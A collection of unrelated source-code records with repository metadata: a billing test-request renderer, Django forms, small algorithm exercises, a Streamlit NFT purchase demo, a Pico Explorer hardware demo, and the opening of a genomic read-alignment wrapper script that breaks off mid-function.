loader.RenderedTemplateOrTemplatePath,\n operation_type: str = 'INSERT_NETTING',\n amount: tp.Optional[float] = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_taxi_light_request(request)\n event = request['event']\n t_id = rand.int64()\n st.add_transactions([t_id])\n event.update({\n \"id\": t_id,\n \"transaction_dt\": formatted.shifted_date_iso(hours=-2),\n \"client_id\": str(st.client_id),\n \"contract_id\": st.get_contract(contr.ServiceContract).id,\n \"invoice_external_id\": st.external_id,\n \"operation_type\": operation_type,\n })\n if amount is not None:\n event[\"amount\"] = amount\n return request\n\n\nclass ProcessorTrustRenderer(BaseProcessorRenderer):\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n request = self.loader.load_trust_request(sender_state.template)\n\n request.update({\n 'namespace': sender_state.namespace,\n 'endpoint': sender_state.endpoint\n })\n\n self._update_event(request['event'], sender_state)\n return request\n\n def _update_event(self, event: dict[str, tp.Any], st: 'state.ExtendedPipelineState') -> None:\n dt = formatted.shifted_date_iso(hours=-4)\n\n event.update({\n 'dt': dt,\n 'postauth_dt': dt,\n 'payment_method_id': st.payment_method_id or event['payment_method_id'],\n 'currency': st.event_currency,\n 'service_id': st.service_id,\n })\n\n products_params = st.products_params or [{}]\n for params in products_params:\n params['partner_id'] = st.client_id\n params['service_id'] = st.service_id\n\n event['products'] = self.generate_products(products_params)\n\n for row in st.rows:\n row['dt'] = dt\n for refund in st.refunds:\n refund['dt'] = refund['payment_dt'] = dt\n\n event['rows'] = self.generate_rows(st.rows)\n if st.refunds:\n event['refunds'] = self.generate_refunds(st.refunds)\n\n @classmethod\n def generate_rows(cls, rows_params: list[dict]) -> list[dict]:\n return [\n deep_update(cls.generate_row(row_id=params.get('row_id')), params)\n for params in rows_params\n ]\n\n @classmethod\n def generate_refunds(cls, refunds_params: list[dict]) -> list[dict]:\n return [\n deep_update(cls.generate_refund(rows_params=params.get('rows', [])), params)\n for params in refunds_params\n ]\n\n @classmethod\n def generate_row(cls, row_id: tp.Optional[int]) -> dict:\n return {\n \"id\": row_id or rand.int64(),\n \"fiscal_nds\": \"nds_none\",\n \"fiscal_inn\": \"\",\n \"fiscal_title\": \"test_fiscal_title\",\n \"price\": 1200.15,\n \"order\": {\n \"contract_id\": None,\n \"commission_category\": None,\n \"update_dt\": \"2021-10-05T14:55:57+00:00\",\n \"service_product_id\": 786020877,\n \"price\": None,\n \"service_order_id_number\": 168366440,\n \"start_dt_utc\": None,\n \"service_product_external_id\": \"1626979513690-DTQA22CMFK-5877\",\n \"clid\": None,\n \"service_order_id\": \"168366439\",\n \"text\": None,\n \"start_dt_offset\": None,\n \"service_id\": 638,\n \"dt\": \"2021-10-05T14:55:57+00:00\",\n \"passport_id\": 4011632014,\n \"region_id\": None\n },\n \"amount\": 1200.15,\n \"fiscal_item_code\": \"\",\n \"fiscal_agent_type\": \"\",\n \"cancel_dt\": None,\n \"quantity\": 0.0\n }\n\n @classmethod\n def generate_refund(cls, rows_params: list[dict]) -> dict:\n return {\n \"resp_desc\": None,\n \"terminal_id\": None,\n \"trust_refund_id\": \"615c678a5b095cb6e55af28e\",\n \"currency\": \"RUB\",\n \"rows\": cls.generate_rows(rows_params=rows_params),\n \"is_reversal\": 0,\n \"payment_dt\": \"2021-10-05T14:56:12+00:00\",\n \"cancel_dt\": None,\n \"resp_dt\": None,\n \"description\": \"cancel payment\",\n \"dt\": \"2021-10-05T14:56:10+00:00\",\n \"refund_to\": \"paysys\",\n \"type\": \"REFUND\",\n \"amount\": 1200.15,\n \"resp_code\": \"success\",\n \"service_id\": 638,\n \"passport_id\": 4011632014\n }\n\n @classmethod\n def generate_products(cls, products_params: list[dict]) -> list[dict]:\n return [\n deep_update(cls.generate_product(product_id=params.get('row_id')), params)\n for params in products_params\n ]\n\n @classmethod\n def generate_product(cls, product_id: tp.Optional[int]) -> dict:\n return {\n \"id\": product_id or 786020877,\n \"partner_id\": 1351796565,\n \"product_type\": \"app\",\n \"name\": \"TestTestAppProduct\",\n \"package_name\": None,\n \"fiscal_title\": \"test_fiscal_title\",\n \"single_purchase\": None,\n \"subs_period\": None,\n \"parent_id\": None,\n \"active_until_dt\": None,\n \"service_fee\": None,\n \"fiscal_nds\": \"nds_20_120\",\n \"hidden\": None,\n \"external_id\": \"638076723262902886\",\n \"subs_trial_period\": None,\n \"inapp_name\": None,\n \"service_id\": 638\n }\n\n\nclass ProcessorOplataRenderer(BaseProcessorRenderer):\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n event = sender_state.event_params or {}\n\n if sender_state.endpoint == 'cashless':\n event_type = event.get('type')\n\n if event_type == 'payment':\n return self.render_cashless_payment_request(\n sender_state=sender_state,\n contract_type=contr.OplataContract,\n request=sender_state.template,\n order_price=event.get('order_price'),\n commission=event.get('commission'),\n item_by_card=event.get('item_by_card'),\n item_by_promocode=event.get('item_by_promocode'),\n )\n\n if event_type == 'refund':\n return self.render_cashless_refund_request(\n sender_state=sender_state,\n contract_type=contr.OplataContract,\n request=sender_state.template,\n original_order_price=event.get('original_order_price'),\n refund_price=event.get('refund_price'),\n item_by_card=event.get('item_by_card'),\n item_by_promocode=event.get('item_by_promocode'),\n )\n\n raise LookupError(f'unknown \"cashless\" endpoint event type in ProcessorOplataRenderer: {event_type}')\n\n if sender_state.endpoint == 'payout':\n return self.render_payout_request(\n st=sender_state,\n request=sender_state.template,\n extended_params=event,\n )\n\n raise LookupError(f'unknown endpoint for ProcessorOplataRenderer: {sender_state.endpoint}')\n\n def render_payout_request(\n self,\n st: 'state.PipelineState',\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_oplata_request(request)\n return self._render_payout_request(st, request, extended_params)\n\n def render_cashless_payment_request(\n self,\n sender_state: 'state.PipelineState',\n contract_type: type,\n request: loader.RenderedTemplateOrTemplatePath,\n order_price: float = None,\n commission: float = None,\n item_by_card: float = None,\n item_by_promocode: float = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_oplata_request(request)\n event: dict[str, tp.Any] = request['event']\n\n self._update_event_merchant(sender_state, event['merchant'], contract_type)\n self._update_event_order(\n sender_state,\n event['order'],\n price=order_price,\n commission=commission,\n item_by_card=item_by_card,\n item_by_promocode=item_by_promocode,\n )\n self._update_event_transaction(event['transaction'])\n\n return request\n\n def render_cashless_refund_request(\n self,\n sender_state: 'state.PipelineState',\n contract_type: type,\n request: loader.RenderedTemplateOrTemplatePath,\n original_order_price: float = None,\n refund_price: float = None,\n item_by_card: float = None,\n item_by_promocode: float = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_oplata_request(request)\n event: dict[str, tp.Any] = request['event']\n\n self._update_event_merchant(sender_state, event['merchant'], contract_type)\n self._update_event_order(\n sender_state,\n event['original_order'],\n price=original_order_price,\n item_by_card=item_by_card,\n item_by_promocode=item_by_promocode,\n ),\n self._update_event_order(\n sender_state,\n event['refund'],\n refund=True,\n price=refund_price,\n item_by_card=item_by_card,\n item_by_promocode=item_by_promocode,\n )\n self._update_event_transaction(event['original_order_transaction'])\n\n return request\n\n @staticmethod\n def _update_event_merchant(\n sender_state: 'state.PipelineState',\n merchant: dict[str, tp.Any],\n contract_type: type,\n ) -> None:\n merchant.update({\n 'client_id': sender_state.client_id,\n 'contract_id': sender_state.get_contract(contract_type).id,\n })\n\n @staticmethod\n def _update_event_order(\n st: 'state.PipelineState',\n order: dict[str, tp.Any],\n refund: bool = False,\n price: float = None,\n commission: float = None,\n item_by_card: float = None,\n item_by_promocode: float = None,\n ) -> None:\n uid = st.refund_uid if refund else st.order_uid\n order_id = st.refund_id if refund else st.refund_id\n\n order.update({\n 'uid': uid,\n 'order_id': order_id,\n 'created': formatted.shifted_date_iso(hours=-4),\n 'updated': formatted.shifted_date_iso(hours=-3),\n 'held_at': formatted.shifted_date_iso(hours=-3),\n 'pay_status_updated_at': formatted.shifted_date_iso(hours=-2),\n 'closed': formatted.shifted_date_iso(hours=-1),\n })\n\n if price is not None:\n order['price'] = price\n\n if commission is not None:\n order['commission'] = commission\n\n for item in order.get('items', []):\n without_markup = item_by_card is None and item_by_promocode is None\n item.update({\n 'total_price': price,\n 'markup': None if without_markup else {\n 'card': item_by_card,\n 'virtual::new_promocode': item_by_promocode,\n }\n })\n\n @staticmethod\n def _update_event_transaction(transaction: dict[str, tp.Any]) -> None:\n transaction.update({\n 'created': formatted.shifted_date_iso(hours=-4),\n 'updated': formatted.shifted_date_iso(hours=-3),\n })\n\n\nclass ProcessorActotronActRowsRenderer(BaseProcessorRenderer, ProcessorActotronActRowsRendererMixin):\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n pass\n\n def render_acts_request(\n self,\n st: 'state.PipelineState',\n contract_type: type,\n request: loader.RenderedTemplateOrTemplatePath,\n namespace: str,\n act_sum_positive: float,\n act_sum_negative: float,\n act_sum_wo_vat_positive: float,\n act_sum_wo_vat_negative: float,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_actotron_act_rows_request(request)\n\n return super().render_acts_request(\n st=st,\n contract_type=contract_type,\n request=request,\n namespace=namespace,\n act_sum_positive=act_sum_positive,\n act_sum_negative=act_sum_negative,\n act_sum_wo_vat_positive=act_sum_wo_vat_positive,\n act_sum_wo_vat_negative=act_sum_wo_vat_negative\n )\n\n\nclass ProcessorTaxiRenderer(BaseProcessorRenderer):\n def render_request(self, sender_state: 'state.ExtendedPipelineState') -> dict:\n pass\n\n def render_stream_request(\n self,\n st: 'state.PipelineState',\n contract_type: type, # subclass of lib.contract.Contract\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n contract = st.get_contract(contract_type)\n if isinstance(request, str):\n request = self.loader.load_taxi_request(request)\n event: dict[str, tp.Any] = request['event']\n amount = extended_params.get('amount') or event.get('amount')\n event['payload']['amount_details']['base_amount'] = str(abs(amount))\n t_id = rand.int64()\n st.add_transactions([t_id])\n event.update({\n \"amount\": amount,\n \"client_id\": st.client_id,\n \"contract_id\": contract.id,\n \"due\": formatted.shifted_date_iso(hours=-3),\n \"event_time\": formatted.shifted_date_iso(seconds=-5),\n \"invoice_date\": formatted.shifted_date_iso(hours=-2),\n \"service_transaction_id\": st.service_transaction_id,\n \"transaction_id\": t_id,\n \"transaction_time\": formatted.shifted_date_iso(hours=-2),\n })\n if extended_params:\n event.update(extended_params)\n return request\n\n def render_revenue_request(\n self,\n st: 'state.PipelineState',\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_taxi_request(request)\n event: dict[str, tp.Any] = request['event']\n amount = extended_params.get('amount') or event.get('amount')\n event['payload']['amount_details']['base_amount'] = amount\n event['payload']['contract_id'] = st.get_contract(contr.ServiceContract).id\n t_id = rand.int64()\n st.add_transactions([t_id])\n event.update({\n \"amount\": amount,\n \"client_id\": st.client_id,\n \"contract_id\": st.get_contract(contr.ServiceContract).id,\n \"due\": formatted.shifted_date_iso(hours=-3),\n \"event_time\": formatted.shifted_date_iso(seconds=-5),\n \"invoice_date\": formatted.shifted_date_iso(hours=-2),\n \"orig_transaction_id\": t_id,\n \"service_transaction_id\": st.service_transaction_id,\n \"transaction_id\": t_id,\n \"transaction_time\": formatted.shifted_date_iso(hours=-2),\n })\n if extended_params:\n event.update(extended_params)\n return request\n\n def render_payout_request(\n self,\n st: 'state.PipelineState',\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_taxi_request(request)\n return self._render_payout_request(st, request, extended_params)\n\n def render_fuel_hold_request(\n self,\n st: 'state.PipelineState',\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_taxi_request(request)\n event = request['event']\n amount = extended_params.get('amount') or event.get('amount')\n t_id = rand.int64()\n st.add_transactions([t_id])\n event.update({\n \"amount\": amount,\n \"dt\": formatted.shifted_date_iso(seconds=-5),\n \"id\": rand.int64(),\n \"client_id\": st.client_id,\n \"contract_id\": st.get_contract(contr.ServiceContract).id,\n \"invoice_eid\": rand.uuid(),\n \"partner_id\": st.client_id,\n \"person_id\": st.person_id,\n \"transaction_id\": str(t_id),\n \"transaction_dt\": formatted.shifted_date_iso(hours=-1),\n \"total_sum\": amount,\n })\n if extended_params:\n event.update(extended_params)\n return request\n\n def render_transfer_init_request(\n self,\n sender_state: 'state.PipelineState',\n receiver_state: 'state.PipelineState',\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_taxi_request(request)\n event = request['event']\n transaction_id = rand.uuid()\n sender_state.add_transactions([transaction_id])\n event.update({\n \"event_time\": formatted.date_iso(),\n \"recipient_billing_client_id\": receiver_state.client_id,\n \"recipient_billing_contract_id\": receiver_state.get_contract(contr.TransferContract).id,\n \"sender_billing_client_id\": sender_state.client_id,\n \"sender_billing_contract_id\": sender_state.get_contract(contr.ServiceContract).id,\n \"transaction_id\": transaction_id,\n })\n if extended_params:\n event.update(extended_params)\n return request\n\n def render_transfer_cancel_request(\n self,\n sender_state: 'state.PipelineState',\n transaction_id: str,\n request: loader.RenderedTemplateOrTemplatePath,\n extended_params: dict = None,\n ) -> loader.RenderedTemplate:\n if isinstance(request, str):\n request = self.loader.load_taxi_request(request)\n event = request['event']\n event.update({\n \"sender_billing_client_id\": sender_state.client_id,\n \"sender_billing_contract_id\": sender_state.get_contract(contr.ServiceContract).id,\n \"transaction_id\": transaction_id,\n })\n if extended_params:\n event.update(extended_params)\n return request\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"billing/tests/lib/templates/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":28611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42913081065","text":"from django.contrib.auth.forms import UserCreationForm\r\nfrom django.contrib.auth.models import User\r\nfrom django import forms\r\nfrom ecommerce.models import Shop, Product, ProductCategory\r\nimport itertools\r\nfrom django.core.exceptions import ValidationError\r\nfrom django.forms import formset_factory, modelformset_factory\r\nfrom ecommerce.models import ProductImage\r\n\r\nclass UserRegisterForm(UserCreationForm):\r\n email = forms.EmailField()\r\n First_Name = forms.CharField()\r\n Last_Name = forms.CharField()\r\n contact = forms.CharField()\r\n Age = forms.IntegerField()\r\n\r\n class Meta:\r\n model = User\r\n fields = ['username', 'email', 'contact', 'Age', 'First_Name', 'Last_Name','password1', 'password2',]\r\n\r\n#allow users to register their shops. this will need to be restricted\r\nclass ShopForm(forms.ModelForm):\r\n class Meta:\r\n model = Shop\r\n fields = ['Shop_Name', 'Description', 'Street_Address', 'Suburb', 'City', 'ZipCode', 'Type', 'image']\r\n\r\n\r\nclass ProductForm(forms.ModelForm):\r\n category = forms.ModelChoiceField(queryset = ProductCategory.objects.all())\r\n class Meta:\r\n model = Product\r\n fields = ['Name', 'ProductType', 'Price', 'Description', 'category', 'Resale']\r\n\r\nclass ProductImageForm(forms.ModelForm):\r\n\r\n class Meta:\r\n model = ProductImage\r\n fields = ['AddImage', 'name', 'Stock', 'sizes']\r\n\r\nProductImageFormset = formset_factory(ProductImageForm, extra =1)\r\nUpdateImageFormset = modelformset_factory(ProductImage, fields = ('AddImage', 'name', 'Stock', 'sizes'))\r\n\r\nclass QuantityForm(forms.Form):\r\n quantity = quantity = forms.IntegerField(initial = 0, widget = forms.NumberInput(attrs = {'style': 'width:60px', 'size': '10'}))\r\n FormId = forms.IntegerField(widget = forms.HiddenInput(), required = False)\r\n ProductId = forms.IntegerField(widget = forms.HiddenInput(), required = False)\r\n\r\nclass CheckoutSignUpForm(UserCreationForm):\r\n email = forms.EmailField()\r\n contact = forms.IntegerField()\r\n\r\n class Meta:\r\n model = User\r\n fields = ['username', 'email', 'contact','password1', 'password2', ]\r\n","repo_name":"MobyDickIsAfrican/TingoVille","sub_path":"profiles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"31706393040","text":"def numSquares(n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n perfectSquares = [1]\n p = 2\n dp = [0]\n\n for i in range(1, n+1):\n if i >= p*p:\n perfectSquares.append(p*p)\n p += 1\n minNumber = dp[i-perfectSquares[0]] + 1\n for square in perfectSquares:\n minNumber = min(minNumber, dp[i-square] + 1)\n dp.append(minNumber)\n return dp[n]\n\nprint(numSquares(10))","repo_name":"callistusystan/algorithmsPractice","sub_path":"LeetCode/PerfectSquares.py","file_name":"PerfectSquares.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"10297586881","text":"\"\"\"\r\n /B--D--F\r\nA | |\r\n \\C--E--G\r\n\"\"\"\r\n\r\nadjacent = {\r\n \"A\": (\"B\", \"C\"),\r\n \"B\": (\"A\", \"C\", \"D\"),\r\n \"C\": (\"B\", \"E\"),\r\n \"D\": (\"B\", \"E\", \"F\"),\r\n \"E\": (\"C\", \"D\", \"G\"),\r\n \"F\": (\"D\",),\r\n \"G\": (\"E\",)\r\n}\r\n\r\ndef dfs_recursive(now, goal, path=[]):\r\n path += [now]\r\n if now == goal:\r\n print(path)\r\n\r\n for n in adjacent[now]:\r\n if n not in path:\r\n dfs_recursive(n, goal, path)\r\n path.pop(-1)\r\n\r\ndef dfs_all(vertex, path=[]):\r\n path += [vertex]\r\n\r\n for n in adjacent[vertex]:\r\n if n not in path:\r\n path = dfs_all(n, path)\r\n\r\n return path\r\n\r\ndef dfs_non_recursive(start):\r\n stack, path = [start], [] # stackは処理待ちリスト pathは通過済み頂点のリスト \r\n\r\n while stack:\r\n vertex = stack.pop() # remove xX*last*Xx item\r\n if vertex in path: # 通ったことがあるか\r\n continue\r\n path.append(vertex) # 通ってよし\r\n for n in adjacent[vertex]: # 次に進むところを探す\r\n stack.append(n)\r\n\r\n return path\r\n\r\ndef dfs_itr(start, goal):\r\n stack, path = [start], []\r\n while stack:\r\n vertex = stack.pop()\r\n if vertex not in path:\r\n path.append(vertex)\r\n\r\n if vertex == goal:\r\n print(path)\r\n\r\n for n in adjacent[vertex]:\r\n stack.append(n)\r\n\r\nif __name__ == \"__main__\":\r\n # dfs_recursive(\"A\", \"G\")\r\n # print(dfs_all(\"A\"))\r\n # print(dfs_non_recursive(\"A\"))\r\n dfs_itr(\"A\", \"G\")\r\n","repo_name":"sushidesu/practice","sub_path":"my_dfs_non_recursive.py","file_name":"my_dfs_non_recursive.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"22340601286","text":"import os\nimport json\nimport streamlit as st\nimport nft\nfrom web3 import Web3\nfrom pathlib import Path\nfrom dotenv import load_dotenv\n\n################################################################################\n# Purchase NFT Artwork: Usecase of the customer who wishes to purchase NFT Token\n################################################################################\n\n# Load configuration settings related to Ganache URL and Solidity Contract ABI\nload_dotenv()\n\n# Define and connect a new Web3 provider\nw3 = Web3(Web3.HTTPProvider(os.getenv(\"WEB3_PROVIDER_URI\")))\n\n################################################################################\n# Contract Helper function:\n################################################################################\n\n\n@st.cache(allow_output_mutation=True)\ndef load_contract():\n\n # Load the contract ABI\n with open(Path('./contracts/compiled/artwork_abi.json')) as f:\n artwork_abi = json.load(f)\n\n contract_address = os.getenv(\"SMART_CONTRACT_ADDRESS\")\n\n # Load the contract\n contract = w3.eth.contract(\n address=contract_address,\n abi=artwork_abi\n )\n\n return contract\n\n# Tab settings\n# tabMain, tabAbout, tabHelp = st.tabs([\"Main\", \"About\", \"Help\"])\n\ncontract = load_contract()\n\n# Read accounts from Ganache instance\naccounts = w3.eth.accounts\n\n\n################################################################################\n# Purchase NFT Artwork\n################################################################################\nst.title('NFT LuckyBar')\nst.markdown(\"---\")\n\nst.markdown(\"## Purchase LuckyBar NFT\")\n\n# Use a streamlit component to get the address of the artwork buyer from the owner\nbuyer_address = st.selectbox(\"Your Wallet Address\", options=accounts)\n\n# Raffle names\noptions = ('Ice-cream', 'Chocolatebar', 'Golden-toilet', 'Something', 'Nothing')\nraffle_index = st.selectbox(\"Choose Your Raffle\", range(len(options)), format_func=lambda x: options[x])\n\nnft_uri_id = raffle_index + 1\n\nst.write(\"Raffle:\", options[raffle_index])\nst.write(\"Raffle Index:\", nft_uri_id)\n\n# Get the NFT URI from nft_store.csv\nartwork_uri = nft.nft_uri(nft_uri_id)\nst.write(artwork_uri)\n\n# Use a streamlit component to set the address of the luckybar\nluckybar_address = st.selectbox(\"LuckyBar Owner Address\", options=accounts)\n\n# st.write(buyer_address)\n\ntoken_amount = st.text_input(\"Raffle Token Price (Wei)\", \"100\")\n\nif st.button(\"Buy NFT Artwork\"):\n # Approve the buyer to transfer token from the NFT owner\n contract.functions.approve(\n buyer_address,\n 0 # TokenID: Make it dynamic to get from nft-stores\n ).call()\n st.write(\"Buyer approved\")\n \n # Use the transferFrom function to transfer the ownership of the nft token to the buyer\n contract.functions.transferFrom(\n luckybar_address,\n buyer_address,\n 0 # TokenID: Make it dynamic to get from nft-stores\n ).call()\n\n st.write(\"Transaction receipt mined\")\n st.balloons()\nst.markdown(\"---\")\n\n################################################################################\n# Display a Token\n################################################################################\n\nst.markdown(\"### Display Your Purchased Art Token\")\n\nselected_address = st.selectbox(\"Select Account\", options=accounts)\n\ntokens = contract.functions.balanceOf(selected_address).call()\nst.write(f\"This address owns {tokens} tokens\")\n\ntoken_id = st.selectbox(\"Artwork Tokens\", list(range(tokens)))\n\nif st.button(\"Display NFT URI\"):\n # Use the contract's `ownerOf` function to get the art token owner\n owner = contract.functions.ownerOf(token_id).call()\n\n st.write(f\"The token is registered to {owner}\")\n\n # Use the contract's `tokenURI` function to get the art token's URI\n token_uri = contract.functions.tokenURI(token_id).call()\n\n st.write(f\"The tokenURI is {token_uri}\")\n st.image(token_uri)\n\nst.markdown(\"---\")\n\n##########","repo_name":"Billie-LS/Lucky_Bar_NFT_menu_of_surprise","sub_path":"LuckyBar/lucky.py","file_name":"lucky.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"31383001235","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\n\nfrom fuzzy_fuss.rbs.rule_base_parser import RuleBaseParser\n\nfrom fuzzy_system import parser\n\nparser.add_argument('--var-indices', nargs=2, default=(0, 1), type=int,\n help=\"Indices of variables for the exhaustive check (in case there is more than 2)\")\nparser.add_argument('--var-grid-range', default=0.5, type=float,\n help=\"Portion of variable value defining the grid range\")\nparser.add_argument('--var-grid-size', default=25, type=int,\n help=\"Size of the grid (number of elements in the range)\")\nparsed_args = parser.parse_args()\n\n# parse the fuzzy rule base from the file\nruleset, measurements = RuleBaseParser().parse(parsed_args.filename)\n\nmeas_grid = {}\nfor variable, value in measurements.items():\n vr = parsed_args.var_grid_range * value\n meas_grid[variable] = np.linspace(value - vr, value + vr, parsed_args.var_grid_size)\n\n\nvar_names = tuple(meas_grid.keys())\ni = parsed_args.var_indices\nvar1 = var_names[i[0]]\nvar2 = var_names[i[1]]\n\nresults = np.zeros(2*(parsed_args.var_grid_size, ))\n\nprint(f\"Performing exhaustive check for {results.size} values...\")\nfor i1, val1 in enumerate(meas_grid[var1]):\n for i2, val2 in enumerate(meas_grid[var2]):\n results[i1, i2] = ruleset.evaluate(measurements={**measurements, var1: val1, var2: val2})\nprint(\"Done\")\n\nprint(f\"NaN values: {100*np.isnan(results).sum()/results.size:g}% of the grid\")\n\nx, y = np.meshgrid(meas_grid[var1], meas_grid[var2])\n\nfig = plt.figure()\nax = plt.axes(projection='3d')\nax.plot_surface(x, y, results, rstride=1, cstride=1, cmap='viridis', vmax=np.nanmax(results), vmin=np.nanmin(results))\nax.set_xlabel(var1)\nax.set_ylabel(var2)\nax.set_zlabel(ruleset.conclusion_names[0])\nax.set_title(f\"Exhaustive rule base '{ruleset.name}' response analysis\")\nplt.show()\n","repo_name":"savetheginger/fuzzy-fuss","sub_path":"examples/exhaustive_check.py","file_name":"exhaustive_check.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"4686023683","text":"import time\nimport picoexplorer as explorer\n\nwidth = explorer.get_width()\nheight = explorer.get_height()\n\ndisplay_buffer = bytearray(width * height * 2) # 2-bytes per pixel (RGB565)\nexplorer.init(display_buffer)\n\nexplorer.set_audio_pin(0)\n\ni = 1\n\nwhile True:\n explorer.set_pen(120, 40, 60)\n explorer.clear()\n\n adc0 = int(explorer.get_adc(0) * 120)\n adc1 = int(explorer.get_adc(1) * 120)\n adc2 = int(explorer.get_adc(2) * 120)\n\n explorer.set_pen(255, 255, 255)\n\n explorer.text(\"ADC0:\", 20, 20, 100)\n explorer.text(\"ADC1:\", 20, 40, 100)\n explorer.text(\"ADC2:\", 20, 60, 100)\n\n explorer.set_pen(adc0 * 2, 0, 0)\n explorer.circle(90 + adc0, 26, 10)\n\n explorer.set_pen(0, adc1 * 2, 0)\n explorer.circle(90 + adc1, 46, 10)\n\n explorer.set_pen(0, 0, adc2 * 2)\n explorer.circle(90 + adc2, 66, 10)\n\n # example for the on-board A/B/X/Y buttons\n if explorer.is_pressed(explorer.BUTTON_A):\n explorer.set_pen(255, 255, 255)\n explorer.text(\"Button A pressed\", 20, 110, 200)\n elif explorer.is_pressed(explorer.BUTTON_B):\n explorer.set_pen(255, 255, 255)\n explorer.text(\"Button B pressed\", 20, 110, 200)\n elif explorer.is_pressed(explorer.BUTTON_X) and explorer.is_pressed(explorer.BUTTON_Y):\n explorer.set_pen(255, 255, 255)\n explorer.text(\"Buttons X and Y pressed\", 20, 110, 200)\n elif explorer.is_pressed(explorer.BUTTON_X):\n explorer.set_pen(255, 255, 255)\n explorer.text(\"Button X pressed\", 20, 110, 200)\n elif explorer.is_pressed(explorer.BUTTON_Y):\n explorer.set_pen(255, 255, 255)\n explorer.text(\"Button Y pressed\", 20, 110, 200)\n else:\n # no button press was detected\n explorer.set_pen(255, 255, 255)\n explorer.text(\"Plug a jumper wire from GP0 to AUDIO to hear noise!\", 20, 110, 200)\n\n explorer.set_tone(i)\n\n if i > 600:\n explorer.text(\"Motor 1: Forwards\", 20, 180, 200)\n explorer.set_motor(0, 0, 1)\n else:\n explorer.text(\"Motor 1: Backwards\", 20, 180, 200)\n explorer.set_motor(0, 1, 1)\n\n if i > 600:\n explorer.text(\"Motor 2: Forwards\", 20, 200, 200)\n explorer.set_motor(1, 0, 1)\n else:\n explorer.text(\"Motor 2: Backwards\", 20, 200, 200)\n explorer.set_motor(1, 1, 1)\n\n i = i + 20\n if i > 1000:\n i = 1\n\n explorer.update()\n time.sleep(0.01)\n","repo_name":"clipstick/projects","sub_path":"Development/Python/Badger2040/pimoroni-pico/micropython/examples/pico_explorer/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"27945988400","text":"'''\nNovember 24, 2017, cjyoon@kaist.ac.kr\nwrapper script to process fastq files into a bam file, adapted from ayh's dnaautoaligner.py\ncurrently only supports BWA alignment for WGS, but can be adapted to RNA-seq alignment\nAfter aligning into a bam, uses Picard's mark duplicate, GATK's indel realigner and base recalibration for final processed bam.\n\nJan 4, 2018 added cleanup module which included option to keep intermediate files per KISTI's request\n'''\n\nimport os\nimport subprocess\nimport sys\nimport yaml\nimport argparse\nimport shlex\nimport re\n\ndef configPath(configurationPath):\n '''configures the path to softwares and input files from a yaml file'''\n with open(configurationPath, 'r') as f:\n pathMaps = yaml.safe_load(f)\n\n try:\n #print(pathMaps)\n JAVAPATH = pathMaps['JAVAPATH']\n PICARDPATH = pathMaps['PICARDPATH']\n GATKPATH = pathMaps['GATKPATH']\n SAMTOOLSPATH = pathMaps['SAMTOOLSPATH']\n BWAPATH = pathMaps['BWAPATH']\n knownIndelPath = pathMaps['knownIndelPath']\n dbSnpPath = pathMaps['dbSnpPath']\n referencePath = pathMaps['referencePath']\n except KeyError:\n print('one of the required input path not specified. Exiting...')\n\n return JAVAPATH, PICARDPATH, GATKPATH, SAMTOOLSPATH, BWAPATH, knownIndelPath, dbSnpPath, referencePath\n\ndef argument_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', default=os.path.dirname(os.path.realpath(__file__)) + '/config.yml', help='yaml file that can configure absolute paths to executable and databases')\n parser.add_argument('-m', '--memory', default=8, help='memory to allocate for Picard Java operation')\n parser.add_argument('-s', '--sampleID', required=True, help='sample name to be added to the header with @RG SM:')\n parser.add_argument('-t', '--thread', default=4, help='number of threads to be used for samtools processes')\n parser.add_argument('-n', '--ncore', default=4, help='number of multicore to utilize')\n parser.add_argument('-f1', '--fastq1', required=True, help='FASTQ Read1 path')\n parser.add_argument('-f2', '--fastq2', required=True, help='FASTQ Read2 path')\n parser.add_argument('-o', '--outputDIR', required=False, default=os.getcwd(), help='path to which aligned bams will be written')\n #parser.add_argument('-r', '--referencePath', required=True, help='reference FASTA path')\n parser.add_argument('-d', '--dryrun', required=False, default=False, help='print out the command lines, but do not actually run those', type=bool)\n 